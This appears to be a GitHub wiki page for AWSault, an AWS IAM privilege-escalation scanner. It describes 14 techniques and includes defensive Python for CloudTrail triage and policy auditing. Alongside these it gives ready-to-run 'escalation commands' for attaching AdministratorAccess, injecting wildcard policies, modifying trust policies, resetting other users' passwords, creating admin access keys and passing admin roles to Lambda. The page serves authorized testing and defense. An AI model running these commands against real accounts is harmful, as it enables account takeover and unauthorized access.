Privilege Escalation - baeziy/AWSault GitHub Wiki

Privilege Escalation Detection

AWSault detects 14 known IAM privilege escalation techniques by scanning all discovered policies — both on your direct identity and on roles you can assume.

How detection works

After building the full identity permission map (see Identity Recon), AWSault:

  1. Collects all policy statements from:
    • Your direct policies (inline, attached, group-inherited)
    • Policies on roles you can assume
  2. For each Allow statement, checks if any action matches a known privesc technique
  3. Supports wildcard matching (e.g., iam:* matches all IAM privesc actions)
  4. Deduplicates findings (same technique + same policy + same role = one finding)
  5. Sorts by severity (CRITICAL first)
  6. For SetDefaultPolicyVersion, also collects the actual alternate policy versions

Detected techniques

CRITICAL severity

| # | Action | Name | Description |
|---|--------|------|-------------|
| 1 | iam:CreatePolicyVersion | Policy Version Injection | Create a new policy version with arbitrary permissions and set it as default |
| 2 | iam:AttachUserPolicy | User Policy Attachment | Attach any managed policy (e.g., AdministratorAccess) to a user |
| 3 | iam:AttachRolePolicy | Role Policy Attachment | Attach any managed policy to a role you can assume |
| 4 | iam:AttachGroupPolicy | Group Policy Attachment | Attach any managed policy to a group you belong to |
| 5 | iam:PutUserPolicy | User Inline Policy Injection | Create an inline policy with arbitrary permissions on a user |
| 6 | iam:PutRolePolicy | Role Inline Policy Injection | Create an inline policy on a role |
| 7 | iam:PutGroupPolicy | Group Inline Policy Injection | Create an inline policy on a group |
| 8 | iam:UpdateAssumeRolePolicy | Trust Policy Modification | Modify a role's trust policy to allow your identity to assume it |

HIGH severity

| # | Action | Name | Description |
|---|--------|------|-------------|
| 9 | iam:SetDefaultPolicyVersion | Policy Version Rollback | Switch a managed policy to an older version that may have more permissions |
| 10 | iam:AddUserToGroup | Group Membership Escalation | Add yourself to a group with higher privileges (e.g., Admins) |
| 11 | iam:CreateLoginProfile | Console Access Creation | Create console login credentials for any user |
| 12 | iam:UpdateLoginProfile | Console Password Change | Change the console password of any user |
| 13 | iam:CreateAccessKey | Access Key Creation | Generate programmatic access keys for any user |
| 14 | iam:PassRole | Role Passing | Pass a high-privilege role to an AWS service (Lambda, EC2, etc.) and execute code as that role |
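The tables above list what to look for in policies; the same 14 actions are also what a defender wants to alert on when they are actually invoked. The following is an added example, not part of AWSault, that triages CloudTrail records for these calls. The 13 iam:* actions are logged with eventSource iam.amazonaws.com and eventName equal to the API name; iam:PassRole is the exception, since it is never logged as its own event but appears as the role ARN inside the service call that consumed it (for Lambda, eventName CreateFunction20150331 with the role in requestParameters). The records below are constructed for this example and trimmed to the fields the check reads; field names follow the CloudTrail record format, and the function names are this example's own.

```python
"""Triage CloudTrail records for the 14 privesc-relevant IAM calls.

Added example, not AWSault code. Records are constructed for the example.
"""
import json

# The 13 IAM API calls from the tables, split by the page's severity tiers.
CRITICAL_IAM_CALLS = {
    "CreatePolicyVersion", "AttachUserPolicy", "AttachRolePolicy", "AttachGroupPolicy",
    "PutUserPolicy", "PutRolePolicy", "PutGroupPolicy", "UpdateAssumeRolePolicy",
}
HIGH_IAM_CALLS = {
    "SetDefaultPolicyVersion", "AddUserToGroup", "CreateLoginProfile",
    "UpdateLoginProfile", "CreateAccessKey",
}
# iam:PassRole has no event of its own; it rides inside service calls such as
# Lambda's CreateFunction, where requestParameters carries the role ARN.
PASSROLE_CARRIERS = {"CreateFunction20150331": "role"}

# Constructed sample records (newline-delimited JSON, one record per line).
# The last one (GetUser) is benign and must not produce a hit.
SAMPLE_RECORDS = [
    json.dumps({"eventSource": "iam.amazonaws.com", "eventName": "CreatePolicyVersion",
                "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/dev-user"},
                "requestParameters": {"policyArn": "arn:aws:iam::123456789012:policy/DevPolicy",
                                      "setAsDefault": True}}),
    json.dumps({"eventSource": "iam.amazonaws.com", "eventName": "AddUserToGroup",
                "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/dev-user"},
                "requestParameters": {"groupName": "Admins", "userName": "dev-user"}}),
    json.dumps({"eventSource": "lambda.amazonaws.com", "eventName": "CreateFunction20150331",
                "userIdentity": {"type": "AssumedRole",
                                 "arn": "arn:aws:sts::123456789012:assumed-role/dev-role/x"},
                "requestParameters": {"functionName": "escalate",
                                      "role": "arn:aws:iam::123456789012:role/admin-role"}}),
    json.dumps({"eventSource": "iam.amazonaws.com", "eventName": "GetUser",
                "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/dev-user"},
                "requestParameters": {"userName": "dev-user"}}),
]


def _targets(params):
    """Compact 'key=value' view of the request parameters that name the target."""
    keys = ("userName", "groupName", "roleName", "policyArn", "versionId")
    return " ".join(f"{k}={params[k]}" for k in keys if k in params)


def triage(record):
    """Classify one parsed CloudTrail record.

    Returns (severity, actor_arn, summary) for privesc-relevant calls, else None.
    """
    name = record.get("eventName", "")
    source = record.get("eventSource", "")
    params = record.get("requestParameters") or {}
    actor = (record.get("userIdentity") or {}).get("arn", "<unknown>")

    if source == "iam.amazonaws.com" and name in CRITICAL_IAM_CALLS:
        summary = f"{name} {_targets(params)}".strip()
        # A new version that is immediately made default is the live escalation.
        if name == "CreatePolicyVersion" and params.get("setAsDefault"):
            summary += " (set as default)"
        return ("CRITICAL", actor, summary)

    if source == "iam.amazonaws.com" and name in HIGH_IAM_CALLS:
        return ("HIGH", actor, f"{name} {_targets(params)}".strip())

    role_key = PASSROLE_CARRIERS.get(name)
    if role_key and params.get(role_key):
        return ("HIGH", actor, f"{name} passing role {params[role_key]}")
    return None


def scan(lines):
    """Parse NDJSON records and return the hits, CRITICAL first (stable order otherwise)."""
    hits = [h for h in (triage(json.loads(line)) for line in lines) if h]
    hits.sort(key=lambda h: 0 if h[0] == "CRITICAL" else 1)
    return hits


if __name__ == "__main__":
    for severity, actor, summary in scan(SAMPLE_RECORDS):
        print(f"{severity:8} {actor}: {summary}")
```

The PassRole handling is the part worth copying: a rule keyed only on eventName "PassRole" will never fire, so the service-side carriers (Lambda here; other services need their own eventName and parameter key) are where that technique becomes visible.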

Detailed technique breakdowns

1. Policy Version Rollback (SetDefaultPolicyVersion)

Severity: HIGH

AWS managed and customer-managed policies can have up to 5 versions. Only the "default" version is active. If you have iam:SetDefaultPolicyVersion, you can switch to any existing version.

AWSault's approach:

  • Enumerates all versions of every managed policy on your identity via list_policy_versions
  • Fetches the full document of each non-default version via get_policy_version
  • Displays the statements in each alternate version so you can see which one has more permissions
  • Generates the exact aws CLI command to switch
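The comparison step in the list above (which alternate version grants more than the default) is the part an auditor can run offline against data pulled with list_policy_versions and get_policy_version. The code below is an added example, not AWSault's own: it summarises the Allow actions of each version and reports alternate versions that grant anything the default's patterns do not cover. SAMPLE_VERSIONS is constructed for the example, the function names are this example's own, and the remediation it prints uses the real aws iam delete-policy-version command with a placeholder policy ARN.

```python
"""Compare a managed policy's default version with its alternate versions.

Added example, not AWSault code. SAMPLE_VERSIONS is constructed for the example.
"""
from fnmatch import fnmatchcase

# Constructed: three versions of one customer-managed policy, keyed by VersionId.
# v2 is the active default; v1 is an older, far broader version; v3 is narrower.
SAMPLE_VERSIONS = {
    "v1": {"IsDefaultVersion": False, "Document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["s3:*", "iam:*", "ec2:*", "lambda:*"], "Resource": "*"},
    ]}},
    "v2": {"IsDefaultVersion": True, "Document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::dev-bucket", "arn:aws:s3:::dev-bucket/*"]},
    ]}},
    "v3": {"IsDefaultVersion": False, "Document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::dev-bucket/*"},
    ]}},
}


def _as_list(value):
    """IAM accepts a bare string or a list for Statement, Action and Resource."""
    return value if isinstance(value, list) else [value]


def allowed_actions(document):
    """Set of lower-cased action patterns from the Allow statements of a document.

    Deny and NotAction statements are ignored on purpose: the question is what
    an alternate version could grant, so over-approximating is the safe side.
    """
    actions = set()
    for stmt in _as_list(document.get("Statement", [])):
        if stmt.get("Effect") == "Allow" and "Action" in stmt:
            actions.update(a.lower() for a in _as_list(stmt["Action"]))
    return actions


def covered(pattern, baseline):
    """True if `pattern` is matched by some pattern in `baseline` (IAM-style '*' and '?')."""
    return any(fnmatchcase(pattern, base) for base in baseline)


def broader_versions(versions):
    """Map VersionId -> sorted extra action patterns, for every non-default
    version that allows something the default version's patterns do not cover."""
    default_id = next(vid for vid, meta in versions.items() if meta["IsDefaultVersion"])
    baseline = allowed_actions(versions[default_id]["Document"])
    findings = {}
    for vid, meta in versions.items():
        if vid == default_id:
            continue
        extra = sorted(a for a in allowed_actions(meta["Document"]) if not covered(a, baseline))
        if extra:
            findings[vid] = extra
    return findings


if __name__ == "__main__":
    for vid, extra in broader_versions(SAMPLE_VERSIONS).items():
        print(f"version {vid} allows more than the default: {', '.join(extra)}")
        # A stale broad version is dormant until someone holding
        # iam:SetDefaultPolicyVersion revives it; deleting it removes the path.
        print(f"  aws iam delete-policy-version --policy-arn <POLICY_ARN> --version-id {vid}")
```

The check compares patterns, not expanded action lists, so a narrower alternate version (v3) produces nothing while a broader one (v1) is reported with the patterns the default lacks. Deleting non-default versions that are broader than the default is the cleanup this finding points at.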

Example output:

HIGH  Policy Version Rollback
      Switch managed policy to older version with more permissions
      action: iam:SetDefaultPolicyVersion (in policy 'DevPolicy')

      Available policy versions to switch to:
        ■ DevPolicy version v1
            Allow: s3:*, iam:*, ec2:*, lambda:*
              → *

Escalation command:

aws iam set-default-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevPolicy \
  --version-id v1

2. Policy Version Injection (CreatePolicyVersion)

Severity: CRITICAL

Create a new version of a managed policy with Action: *, Resource: * and set it as the default.

Escalation command:

aws iam create-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/MyPolicy \
  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}' \
  --set-as-default

3. User/Role/Group Policy Attachment

Severity: CRITICAL

Attach AdministratorAccess (or any other policy) to a user, role, or group.

Escalation commands:

# attach to user
aws iam attach-user-policy \
  --user-name target-user \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# attach to role
aws iam attach-role-policy \
  --role-name target-role \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# attach to group
aws iam attach-group-policy \
  --group-name target-group \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

4. Inline Policy Injection

Severity: CRITICAL

Create an inline policy with full admin permissions on a user, role, or group.

Escalation commands:

# on user
aws iam put-user-policy \
  --user-name target-user \
  --policy-name admin \
  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}'

# on role
aws iam put-role-policy \
  --role-name target-role \
  --policy-name admin \
  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}'

5. Group Membership Escalation (AddUserToGroup)

Severity: HIGH

Add your user to a group that has admin or higher-privilege policies.

aws iam add-user-to-group --user-name your-user --group-name Admins

6. Console Access Manipulation

Severity: HIGH

Create or change console passwords for other users, then log in as them.

# create login for user without console access
aws iam create-login-profile --user-name target-user --password 'P@ssw0rd123!'

# change existing password
aws iam update-login-profile --user-name target-user --password 'P@ssw0rd123!'

7. Access Key Creation (CreateAccessKey)

Severity: HIGH

Generate programmatic access keys for any user, including admin users.

aws iam create-access-key --user-name admin-user

8. Trust Policy Modification (UpdateAssumeRolePolicy)

Severity: CRITICAL

Modify a role's trust policy so your identity can assume it.

aws iam update-assume-role-policy \
  --role-name high-priv-role \
  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"AWS":"arn:aws:iam::123456789012:user/your-user"},"Action":"sts:AssumeRole"}]}'

9. Role Passing (PassRole)

Severity: HIGH

Pass a high-privilege role to a service you control (e.g., create a Lambda function that runs as an admin role).

# create lambda with admin role
aws lambda create-function \
  --function-name escalate \
  --runtime python3.9 \
  --role arn:aws:iam::123456789012:role/admin-role \
  --handler index.handler \
  --zip-file fileb://function.zip

Output

Terminal

Privesc paths are displayed prominently with a red banner:

  PRIVILEGE ESCALATION PATHS (3)

    CRITICAL  Policy Version Injection
      Create a new policy version with arbitrary permissions
      action: iam:CreatePolicyVersion (in policy 'DevPolicy')

    HIGH  Policy Version Rollback (via role dev-role)
      Switch managed policy to older version with more permissions
      action: iam:SetDefaultPolicyVersion (in policy 'DevPolicy')

HTML report

Shown in the Recon tab with severity badges, collapsible details, and alternate version statements.

CSV export

Flat rows with severity, name, action, via_policy, via_role, resources, and description.

JSON export

Structured data under recon.PrivescPaths.

Wildcard matching

AWSault handles IAM wildcard patterns correctly:

  • iam:* matches all 14 privesc actions
  • iam:Create* matches CreatePolicyVersion, CreateLoginProfile, CreateAccessKey
  • * matches everything
  • Matching is case-insensitive for the action portion
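The following added example, not AWSault's own code, puts the two descriptions together: the steps under "How detection works" (collect statements from direct policies and from assumable roles, match every Allow action against the 14 techniques, deduplicate on technique + policy + role, sort CRITICAL first) and the wildcard rules just listed. The identity map is constructed for the example and the function names are this example's own.

```python
"""Static privilege-escalation check over IAM Allow statements.

Added example, not AWSault code. IDENTITY is constructed for the example.
"""
from fnmatch import fnmatchcase

# The 14 techniques from the tables on this page: action -> (name, severity)
PRIVESC_TECHNIQUES = {
    "iam:CreatePolicyVersion": ("Policy Version Injection", "CRITICAL"),
    "iam:AttachUserPolicy": ("User Policy Attachment", "CRITICAL"),
    "iam:AttachRolePolicy": ("Role Policy Attachment", "CRITICAL"),
    "iam:AttachGroupPolicy": ("Group Policy Attachment", "CRITICAL"),
    "iam:PutUserPolicy": ("User Inline Policy Injection", "CRITICAL"),
    "iam:PutRolePolicy": ("Role Inline Policy Injection", "CRITICAL"),
    "iam:PutGroupPolicy": ("Group Inline Policy Injection", "CRITICAL"),
    "iam:UpdateAssumeRolePolicy": ("Trust Policy Modification", "CRITICAL"),
    "iam:SetDefaultPolicyVersion": ("Policy Version Rollback", "HIGH"),
    "iam:AddUserToGroup": ("Group Membership Escalation", "HIGH"),
    "iam:CreateLoginProfile": ("Console Access Creation", "HIGH"),
    "iam:UpdateLoginProfile": ("Console Password Change", "HIGH"),
    "iam:CreateAccessKey": ("Access Key Creation", "HIGH"),
    "iam:PassRole": ("Role Passing", "HIGH"),
}
SEVERITY_ORDER = {"CRITICAL": 0, "HIGH": 1}

# Constructed identity map in the shape Identity Recon would produce:
# one direct policy plus one policy reachable through an assumable role.
IDENTITY = {
    "direct_policies": [
        {"name": "DevPolicy", "document": {"Version": "2012-10-17", "Statement": [
            {"Effect": "Allow", "Action": ["iam:Create*", "s3:GetObject"], "Resource": "*"},
        ]}},
    ],
    "assumable_roles": [
        {"role": "dev-role", "policies": [
            {"name": "RoleOps", "document": {"Version": "2012-10-17", "Statement": [
                {"Effect": "Allow", "Action": "iam:PassRole",
                 "Resource": "arn:aws:iam::123456789012:role/admin-role"},
                # Same action granted again (different case) in the same policy:
                # the dedup rule must collapse it into the finding above.
                {"Effect": "Allow", "Action": ["IAM:passrole", "iam:UpdateAssumeRolePolicy"],
                 "Resource": "*"},
            ]}},
        ]},
    ],
}


def action_matches(pattern, action):
    """IAM action wildcard semantics: '*' and '?' in the pattern, case-insensitive."""
    return fnmatchcase(action.lower(), pattern.lower())


def _as_list(value):
    """IAM accepts a bare string or a list for Statement, Action and Resource."""
    return value if isinstance(value, list) else [value]


def allow_grants(document):
    """Yield (action_pattern, resources) for every Allow statement with an Action key."""
    for stmt in _as_list(document.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or "Action" not in stmt:
            continue
        resources = _as_list(stmt.get("Resource", "*"))
        for pattern in _as_list(stmt["Action"]):
            yield pattern, resources


def find_privesc_paths(identity):
    """Return findings sorted CRITICAL first, one per (technique, policy, role)."""
    sources = [(policy, None) for policy in identity.get("direct_policies", [])]
    for role in identity.get("assumable_roles", []):
        sources.extend((policy, role["role"]) for policy in role["policies"])

    seen = set()
    findings = []
    for policy, via_role in sources:
        for pattern, resources in allow_grants(policy["document"]):
            for action, (name, severity) in PRIVESC_TECHNIQUES.items():
                if not action_matches(pattern, action):
                    continue
                key = (name, policy["name"], via_role)  # the page's dedup rule
                if key in seen:
                    continue
                seen.add(key)
                findings.append({"severity": severity, "name": name, "action": action,
                                 "via_policy": policy["name"], "via_role": via_role,
                                 "resources": resources})
    findings.sort(key=lambda f: (SEVERITY_ORDER[f["severity"]], f["name"]))
    return findings


if __name__ == "__main__":
    for f in find_privesc_paths(IDENTITY):
        via = f" (via role {f['via_role']})" if f["via_role"] else ""
        print(f"{f['severity']:8} {f['name']}{via}: {f['action']} in policy '{f['via_policy']}'")
```

On the constructed input this yields five findings: iam:Create* expands to three techniques on the direct policy, and the role contributes Trust Policy Modification plus a single Role Passing finding despite the action being granted twice. Only Allow statements are considered, as the page describes, so an explicit Deny elsewhere in the identity is not taken into account by this check.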

Via assumable roles

Privesc paths found through assumable roles are tagged with (via role <role-name>). This means:

  1. First assume the role: aws sts assume-role --role-arn <arn> --role-session-name x
  2. Then execute the escalation command with the temporary credentials